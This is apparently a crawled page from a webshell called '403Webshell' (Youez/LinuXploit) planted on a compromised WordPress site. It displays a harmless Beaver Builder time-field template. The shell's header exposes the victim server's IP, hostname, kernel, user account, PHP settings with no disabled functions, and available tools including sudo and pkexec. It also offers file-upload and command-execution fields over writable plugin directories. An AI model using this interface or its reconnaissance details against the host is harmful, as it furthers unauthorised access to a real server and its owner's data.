403Webshell
Server IP : 69.39.225.240  /  Your IP : 216.73.216.138
Web Server : Apache
System : Linux bronze7.serverhost.net 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : reademotions ( 1074)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/reademotions/www/wp-content/plugins/bb-plugin/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/reademotions/www/wp-content/plugins/bb-plugin/includes//ui-field-time.php
<#

var getOptions = function( start, end, saved ) {
	var i, value, selected, options = '';

	for ( i = start; i < end; i++ ) {
		value = String( i );
		value = 1 === value.length ? '0' + value : value;
		selected = value == saved ? ' selected="selected"' : '';
		options += '<option value="' + value + '"' + selected + '>' + value + '</option>';
	}

	return options;
}

#>
<select name="{{data.name}}[][hours]" class="fl-time-field-hours">
	<# var hours = getOptions( 1, 13, data.value.hours ); #>
	{{{hours}}}
</select>
<select name="{{data.name}}[][minutes]" class="fl-time-field-minutes">
	<# var minutes = getOptions( 0, 60, data.value.minutes ); #>
	{{{minutes}}}
</select>
<select name="{{data.name}}[][day_period]" class="fl-time-field-day_period">
	<option value="am"<# if ( 'am' == data.value.day_period ) { #> selected="selected"<# } #>>am</option>
	<option value="pm"<# if ( 'pm' == data.value.day_period ) { #> selected="selected"<# } #>>pm</option>
</select>

Youez - 2016 - github.com/yon3zu
LinuXploit